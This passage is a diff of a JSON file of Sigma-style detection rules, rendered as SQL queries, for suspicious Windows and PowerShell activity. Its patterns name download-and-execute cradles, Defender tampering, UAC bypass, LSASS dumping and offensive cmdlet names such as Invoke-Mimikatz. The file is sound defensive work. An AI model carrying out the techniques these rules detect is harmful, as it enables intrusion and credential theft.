'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" 
+ "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE 
'%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND 
CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - 
"filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE 
'%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", 
+ "author": "Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ 
- "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR 
Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE 
